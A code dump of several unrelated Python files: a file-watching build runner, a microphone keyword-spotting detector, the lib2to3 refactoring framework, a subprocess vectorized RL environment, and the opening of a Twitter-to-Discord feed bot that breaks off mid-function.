print("killing task: {} {}".format(ANSI["BRIGHTRED"], self.name))
self.proc.kill()
def is_alive():
return self.proc.is_alive()
class BDef:
def __init__(self):
self.rules = []
self.path = "bdef.yml"
self.bdef = None
self.cache = {}
self.tasks = {}
def fromdef(self, bdef):
self.bdef = bdef
for ( name , rdef ) in self.bdef.items():
self.rules.append(BRule(name, rdef))
return self
def frompath(self, path = "bdef.yml"):
self.path = path
self.fromdef(yaml.load(open(path)))
return self
def cachepath(self):
return self.path + ".cache"
def putcache(self):
yaml.dump(self.cache, open(self.cachepath(),"w"))
return self
def getcache(self):
self.cache = ry(self.cachepath(),{})
self.putcache()
return self
def getlastmodfromcache(self, path):
if path in self.cache:
return self.cache[path]
return 0
def updatecache(self):
for rule in self.rules:
for dep in rule.deps:
path = dep.path
lastmod = getlastmod(path)
self.cache[path] = lastmod
self.putcache()
def build(self, loop = False):
t = time.time()
self.getcache()
somechange = False
for rule in self.rules:
changed = False
for dep in rule.deps:
path = dep.path
lastmodcache = self.getlastmodfromcache(path)
lastmod = getlastmod(dep.path)
if lastmod > lastmodcache:
changed = True
break
if changed:
somechange = True
if rule.run:
if loop:
if rule.refresh:
browser.refresh()
elif rule.name in self.tasks:
task = self.tasks[rule.name]
if changed:
if rule.restart:
sys.exit(0)
else:
task.kill()
task.run()
else:
task = BTask(rule.name, rule.cmds, rule.color)
self.tasks[rule.name] = task
task.run()
time.sleep(1)
elif changed:
print(ANSI["CYAN"])
print("building {}".format(rule.name))
for cmd in rule.cmds:
print(ANSI["YELLOW"])
print("running command {}".format(cmd))
print(ANSI["YELLOW"])
returncode = runcmd(cmd)
print(ANSI["ENDC"])
if returncode > 0:
raise BuildCommandFailedException(rule.name, cmd)
else:
print(ANSI["GREEN"])
print("{} {} success".format(rule.name, cmd))
else:
if not loop:
print(ANSI["MAGENTA"])
print("{} up to date".format(rule.name))
elapsed = time.time() - t
if ( not loop ) or somechange:
print(ANSI["BRIGHTGREEN"])
print("build succeeded in {:.2f} seconds".format(elapsed))
print(ANSI["ENDC"])
self.updatecache()
return somechange
###################################################
b = BDef().frompath()
###################################################
def build_thread_func():
global browserinit
while True:
somechange = b.build(loop = True)
if somechange or browserinit:
if browserinit:
time.sleep(1)
browser.get('http://localhost:5000')
browserinit = False
else:
browser.refresh()
time.sleep(1)
###################################################
bth = threading.Thread(target = build_thread_func)
bth.start()
#b.build(loop = True)
###################################################
|
kws_detector.py
|
"""
This is a packet of KWS detection,
dependent on DNN training part
"""
import pyaudio
import ctypes as ct
import numpy as np
import wave
import math
import matplotlib.pyplot as plt
import pyaudio
import os
import librosa
import librosa.display
import threading
import time
from numpy.linalg import norm
from kws_do_inference import KwsNNet
class KwsDetector:
def __init__(self, chunk, record_device_name, record_width, channels, rate, format, wav_path):
self.CHUNK = 1024
self.RECORD_DEVICE_NAME = "MacBook Pro 麦克风"
self.RECORD_WIDTH = 2
self.CHANNELS = 1
self.RATE = 16000
self.FORMAT = pyaudio.paInt16
self.WAV_PATH = "/Users/xyzhao/Desktop/sound_localization/wakeup/stream_tmp"
self.device_index = self.setup_device_index()
now = int(round(time.time()*1000))
self.RANDOM_PREFIX = time.strftime('%m-%d_%H:%M',time.localtime(now/1000))
"""
init NN model, and load graph
"""
# self.KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "Pretrained_models/DNN/DNN_M.pb", "Pretrained_models/labels.txt")
"""
Window settings
"""
# can be large enough
self.RECORD_SECONDS = 500
# need to contain the word
self.WINDOW_SECONDS = 1
# number of frames in a stream
self.frame_num_total = int(self.RATE / self.CHUNK * self.RECORD_SECONDS)
# number of frames in a window
self.frame_num_win = int(self.RATE / self.CHUNK * self.WINDOW_SECONDS)
# number of frames for one stride
self.frame_num_stride = 3 # 5
# after read how many windows flush the buffer, large enough since no delay
self.win_num_flush = 100 # 10
# frames buffer from stream, need flush after sometime
self.frames_buffer = []
# to avoid buffer conflict when do flush
self.buffer_lock = threading.Lock()
# trigger for flush, init start frame
self.flush_event = threading.Event()
self.end_event = threading.Event()
def setup_device_index(self):
device_index = -1
p = pyaudio.PyAudio()
"""
Recognize Mic device, before loop
"""
# scan to get usb device
for index in range(0, p.get_device_count()):
info = p.get_device_info_by_index(index)
device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(self.RECORD_DEVICE_NAME) != -1:
device_index = index
# break
if device_index != -1:
print("find the device")
print(p.get_device_info_by_index(device_index))
else:
print("don't find the device")
return device_index
def store_frames_to_file(self, frames, name_id):
# set to only one temp wav file in real
wave_output_filename = self.RANDOM_PREFIX + "win.wav" # % (name_id)
wf = wave.open(os.path.join(self.WAV_PATH, wave_output_filename), 'wb')
wf.setnchannels(self.CHANNELS)
wf.setsampwidth(self.RECORD_WIDTH)
wf.setframerate(self.RATE)
wf.writeframes(b''.join(frames))
wf.close()
def read_from_stream(self):
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(self.RECORD_WIDTH),
channels=self.CHANNELS,
rate=self.RATE,
input=True,
input_device_index=self.device_index)
for i in range(0, self.frame_num_total):
# if self.end_event.is_set() is True:
# break
frame = stream.read(self.CHUNK)
self.frames_buffer.append(frame)
# if i % self.frame_num_win == 0 and i != 0:
# print("read in a window size")
# flush the buffer
# after a large time duration to avoid high memory useage
if i % (self.frame_num_win * self.win_num_flush) == 0 and i != 0:
print("===== p1: set the flush")
self.flush_event.set()
self.buffer_lock.acquire()
self.frames_buffer = []
self.buffer_lock.release()
stream.stop_stream()
stream.close()
p.terminate()
def process_from_buffer(self):
# KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "Pretrained_models/DNN/DNN_M.pb", "Pretrained_models/labels.txt")
KwsNet = KwsNNet(os.path.join(self.WAV_PATH, self.RANDOM_PREFIX + "win.wav"), "follow.pb", "tmp/speech_commands_train/follow_labels.txt")
# init setting
window_count = 0
start_frame = 0
continous_wakeups = 0
while True:
frames = []
if self.flush_event.is_set() is True:
print("===== p2: detect the flush")
start_frame = 0
self.flush_event.clear()
time.sleep(self.WINDOW_SECONDS)
if start_frame >= self.frame_num_total:
print("ERROR: start frame out of buffer. ")
exit()
self.buffer_lock.acquire()
for i in range(0, self.frame_num_win):
# detect index out of ranage, wait for p1 to fill the buffer
while (start_frame + i) >= len(self.frames_buffer):
continue
frames.append(self.frames_buffer[start_frame + i])
self.buffer_lock.release()
self.store_frames_to_file(frames, window_count)
# call DNN part to do inference for this file
this_frame_status = KwsNet.do_inference()
if this_frame_status == 1:
continous_wakeups += 1
print(continous_wakeups)
elif this_frame_status == 0:
continous_wakeups -= 0.3
if continous_wakeups < 0:
continous_wakeups = 0
# print(continous_wakeups)
if continous_wakeups >= 3:
print(" ====== wake up")
# self.end_event.set()
# break
# time.sleep(0.05)
window_count += 1
start_frame += self.frame_num_stride
# print("process a window")
def slide_win_loop(self):
p1 = threading.Thread(target=self.read_from_stream, args=())
p2 = threading.Thread(target=self.process_from_buffer, args=())
p1.start()
time.sleep(1)
time.sleep(self.WINDOW_SECONDS)
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
kws = KwsDetector(1, 2, 3, 4, 5, 6, 7)
kws.slide_win_loop()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import io
import os
import pkgutil
import sys
import logging
import operator
import collections
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fix_names = []
for finder, name, ispkg in pkgutil.iter_modules(pkg.__path__):
if name.startswith("fix_"):
if remove_prefix:
name = name[4:]
fix_names.append(name)
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return {pat.type}
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" % (pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(
pygram.python_grammar.symbol2number.values(), pygram.python_grammar.tokens
):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [
pkg_name + "." + fix_name for fix_name in get_all_fix_names(pkg_name, False)
]
def _identity(obj):
return obj
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {
"print_function": False,
"exec_function": False,
"write_unchanged_files": False,
}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: a dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
self.grammar = pygram.python_grammar.copy()
if self.options["print_function"]:
del self.grammar.keywords["print"]
elif self.options["exec_function"]:
del self.grammar.keywords["exec"]
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(
self.grammar, convert=pytree.convert, logger=self.logger
)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX) :]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name)) from None
fixer = fix_class(self.options, self.fixer_log)
if (
fixer.explicit
and self.explicit is not True
and fix_mod_path not in self.explicit
):
self.log_message("Skipping optional fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and os.path.splitext(name)[1] == py_ext:
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except OSError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with io.open(filename, "r", encoding=encoding, newline="") as f:
return f.read(), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(
str(tree)[:-1], filename, write=write, encoding=encoding
)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s", name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
# use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
# sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
# some fixers(eg fix_imports) must be applied
# with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
# new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr] = []
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(
self, new_text, filename, old_text=None, write=False, encoding=None
):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding, newline="")
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(
self.refactor_doctest(block, block_lineno, indent, filename)
)
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif indent is not None and (
line.startswith(indent + self.PS2)
or line == indent + self.PS2.rstrip() + "\n"
):
block.append(line)
else:
if block is not None:
result.extend(
self.refactor_doctest(block, block_lineno, indent, filename)
)
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno, indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error(
"Can't parse docstring in %s line %s: %s: %s",
filename,
lineno,
err.__class__.__name__,
err,
)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[: lineno - 1], new[lineno - 1 :]
assert clipped == ["\n"] * (lineno - 1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix) :]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False, num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only
)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [
multiprocessing.Process(target=self._child) for i in range(num_processes)
]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only
)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs
)
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from rlstudy.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
import cv2
cv2.imshow('vecenv', bigimg[:,:,::-1])
cv2.waitKey(1)
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
|
twitterfeed.py
|
from StocktonBotPackage.DevUtilities import configutil, utils
from collections import OrderedDict
import discord
import tweepy
import os
import datetime
import threading
import asyncio
import json
import warnings
import copy
class TweepyClient:
def __init__(self, profile=None):
self.auth = tweepy.OAuthHandler(os.environ['TWITTER-API-KEY'], os.environ['TWITTER-API-KEY-SECRET'])
self.auth.set_access_token(os.environ['TWITTER-ACCESS-TOKEN'], os.environ['TWITTER-ACCESS-TOKEN-SECRET'])
self.api = tweepy.API(self.auth)
self.user_id = os.environ['TWITTER-ID-STOCKTON-ESPORTS']
self.profile = profile
def get_rate_limit(self):
remaining = self.api.rate_limit_status()['resources']['application']['/application/rate_limit_status']['remaining']
return remaining
def get_rates_timeline(self):
"""
:return: Timeline remaining rates
"""
return self.api.rate_limit_status()['resources']['statuses']['/statuses/user_timeline']['remaining']
def get_rates_id(self):
"""
:return: ID remaining rates
"""
return self.api.rate_limit_status()['resources']['statuses']['/statuses/show/:id']['remaining']
def get_all_rate_limits(self):
return self.api.rate_limit_status()
class StdOutListener(tweepy.StreamListener):
def __init__(self):
super().__init__()
self.is_streaming = False
self.social_media_channel = None
self.commands_channel = None
self.static_data = None
self.dynamic_data = None
self.error = None
def on_data(self, raw_data):
"""
This method is overridden.
:param raw_data: data that is streamed in from the stream listener
:return True if data was successfully streamed
"""
self.static_data = tweet_data_wrapper.get_static_data(raw_data)
self.dynamic_data = tweet_data_wrapper.get_dynamic_data()
def on_error(self, status):
"""
This method if: error that's passed in through status to stream
"""
print(f"Twitter Stream Error: {status}")
self.error = status
def thread_stream(self):
"""
Data retrieved automatically pipes to StdOutListener
Note: separate thread allows for stream listening
with disregard to process blocking
"""
print(f"Starting Twitter stream thread...")
self.is_streaming = True
stream = tweepy.Stream(client.auth, listener) # Listener is responsible for data handling
stream.filter(follow=[client.user_id]) # Function cuts off early here
class TweetDataRetrieverWrapper:
def __init__(self):
self._twitter_icon_url = "https://cdn.clipart.email/fcf0df581fb3270b21dc370803b034ad_logo-twitter-circle-png-transparent-image-47449-free-icons-and-_2267-2267.png"
self._tweet = None
def get_static_data(self, data, tweet_index=None):
"""
:param data: the data retrieved from either the stream or otherwise
manual API calls
:param tweet_index: default None- increment this index if you wish
to retrieve multiple tweets and are *manually* pulling the tweets
(i.e., direct status calls)
:return: tuple data in the following order:
:returns: text, date, handle, followers, following, username, icon_url,
thumbnail_url, img_url
return None if the tweet was not found (the poll method won't execute)
"""
self._tweet = self._get_tweet_from_data(data, tweet_index)
if self._tweet is None:
console_color_red = '\033[93m'
console_color_normal = '\033[0m'
print(f"{console_color_red}Tweet is none{console_color_normal}")
return None
text = self._get_full_text()
followers = self._tweet.user.followers_count
following = self._tweet.user.friends_count
username = self._tweet.user.name
icon_url = self._twitter_icon_url
# thumbnail_url = str(self._tweet.profile_image_url).replace("normal.jpg", "400x400.jpg")
thumbnail_url = "https://pbs.twimg.com/profile_images/1219805354059599872/sVdcP-_G_400x400.jpg"
handle = "@" + self._tweet.author.screen_name
twitter_url = f"https://www.twitter.com/{self._tweet.author.screen_name}"
if self._is_retweet(self._tweet):
text, handle, twitter_url = self._adjust_fields_for_retweet(text)
else:
if handle in text:
text = str(text).replace(f"{handle}", f"**{handle}**", 1)
handle = "Mention in " + handle
try:
website_url = self._tweet.entities['url']['urls'][0]['expanded_url'] # The user's linked personal website URL
except Exception:
website_url = twitter_url # Revert to user's twitter link if no personal website
try:
img_url = self._tweet.entities['media'][0]['media_url_https']
except Exception:
img_url = None
try:
month_day_year = datetime.datetime.date(self._tweet.created_at).strftime('%h %d, %Y')
normal_time = self._convert_from_military_to_normal(self._tweet.created_at)
date = month_day_year + " | " + normal_time
except Exception as e:
